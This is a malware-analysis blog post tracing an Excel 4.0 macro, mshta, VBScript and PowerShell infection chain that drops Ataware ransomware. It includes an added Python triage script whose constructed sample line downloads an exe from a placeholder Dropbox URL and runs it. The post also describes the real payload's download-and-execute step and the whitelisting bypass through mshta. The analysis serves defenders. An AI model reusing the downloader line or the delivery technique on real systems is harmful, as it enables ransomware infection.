- 7 Jul 2013
This will be a multi-part blog series analysing the complete infection chain from Excel to Ataware Ransomware. In this post we will discuss the analysis steps for the hta, VBScript & PowerShell code to extract the final payload URL. Let's start with the xls. I was browsing Twitter for an interesting sample, then I found this tweet from nao_sec and started investigating. You can download the xls from ANY.RUN.
Overview of analysis steps
xls analysis steps
Check the file type and extract the strings
Code:
strings "563902-IT Services Procurement Catalog updated.xls" > str_excel.txt
file and strings on xls
Go through the strings output and you will find the mshta command with the Dropbox URL
mshta string
Output from the strings command
Now you know this Excel file is definitely malicious, using only the strings tool
Let's analyse it further to understand how mshta is invoked
Run olevba on the xls; as you can see in the output below, it uses an Excel 4.0 macro on a hidden sheet to execute the mshta command
Olevba tool
Detecting Excel 4.0 Macro
For more details on Excel 4.0 macros, check the references section [1]. Now we will move on to the hta file analysis.
htseelaaa.hta analysis
Content of hta file
Why are attackers using hta?
HTAs are standalone applications that execute using the same models and technologies as Internet Explorer, but outside of the browser [2]. An hta file can be executed using the built-in, trusted Windows utility mshta, which can bypass application whitelisting.
Deobfuscation Steps
Extract the VBScript code from the hta file and save it as a .vbs file
Replace the Eval with WScript.Echo and execute it using cscript
Execute cscript
Replace Eval with Wscript.Echo and run using cscript
Now you can see the base64-encoded PowerShell code. Instead of deobfuscating it manually, let's run the PowerShell code inside our VM with FakeNet-NG
Execute PowerShell
Execute PowerShell code extracted from VBScript
Enable PowerShell Enhanced Logging before running the PowerShell code above; for more details, see the post Deobfuscate PowerShell using PowerShell Logging
After executing it, go through the PowerShell logs in Event Viewer to find the deobfuscated code, as shown below
Decoded PowerShell
Decoded PowerShell in PowerShell Logs
Copy the PowerShell code, remove the iex (Invoke-Expression), and execute it to see the final decoded code shown below
Final Decoded PS
This PowerShell script downloads the PE file from the Dropbox link, saves it in the $temp directory with the filename ATAPIinit.exe, and executes it.
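The deobfuscation steps above can also be done statically. The following Python triage script is an added example (not code from the original post or from the sample): it decodes the -EncodedCommand layer (base64 over UTF-16LE), peels the inner FromBase64String blob without executing it, swaps iex for Write-Output the same way the post swaps Eval for WScript.Echo, and pulls out the URL and dropped filename. The sample command line is constructed here with a placeholder Dropbox URL, not the real one.

```python
import base64
import re

# Constructed sample of the final PowerShell layer; the Dropbox URL is a placeholder.
INNER_SCRIPT = ("$u='https://www.dropbox.com/s/EXAMPLEID/x.bin?dl=1';"
                "$f=$env:temp+'\\ATAPIinit.exe';"
                "(New-Object Net.WebClient).DownloadFile($u,$f);Start-Process $f")

ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")

def build_sample() -> str:
    """Layer INNER_SCRIPT like the post's sample: iex of a base64 blob, passed to
    powershell.exe as a UTF-16LE -EncodedCommand."""
    inner_b64 = base64.b64encode(INNER_SCRIPT.encode("utf-8")).decode()
    outer = ("iex ([Text.Encoding]::UTF8.GetString("
             f"[Convert]::FromBase64String('{inner_b64}')))")
    enc = base64.b64encode(outer.encode("utf-16-le")).decode()
    return f"powershell -w hidden -ep bypass -EncodedCommand {enc}"

def decode_encoded_command(cmdline: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, not UTF-8."""
    m = ENC_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")

def peel_layers(script: str, max_layers: int = 5) -> list:
    """Decode nested FromBase64String('...') blobs without executing anything,
    the static equivalent of running the code with iex removed."""
    layers = [script]
    for _ in range(max_layers):
        m = B64_RE.search(layers[-1])
        if not m:
            break
        layers.append(base64.b64decode(m.group(1)).decode("utf-8"))
    return layers

def defang(script: str) -> str:
    # Same trick as Eval -> WScript.Echo: swap the execution primitive for output.
    return re.sub(r"\b(iex|invoke-expression)\b", "Write-Output", script, flags=re.I)

def triage(cmdline: str) -> dict:
    layers = peel_layers(decode_encoded_command(cmdline))
    final = layers[-1]
    return {"layers": layers,
            "defanged": [defang(s) for s in layers],
            "urls": re.findall(r"https?://[^\s'\"();]+", final),
            "exe_names": re.findall(r"[\w.-]+\.exe", final)}
```

Run triage() on the command line captured from the echoed VBScript to get every decoded layer, a defanged copy of each, and the IoCs without executing the downloader.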
Conclusion
The infection vector is unusual: it uses the Excel 4.0 macro technique together with mshta and PowerShell.
Heavily obfuscated to slow down analysis.
Uses Dropbox for initial payload delivery, as Dropbox may be allowed through the proxy.
Hope you enjoyed this post.
Turkish version: https://www.turkhackteam.org/adli-b...aware-ransomware-1-kisim-0x1.html#post9235007
Source: https://www.securityinbits.com/malw...owershell-analysis-ataware-ransomware-part-1/
Translator: Gauloran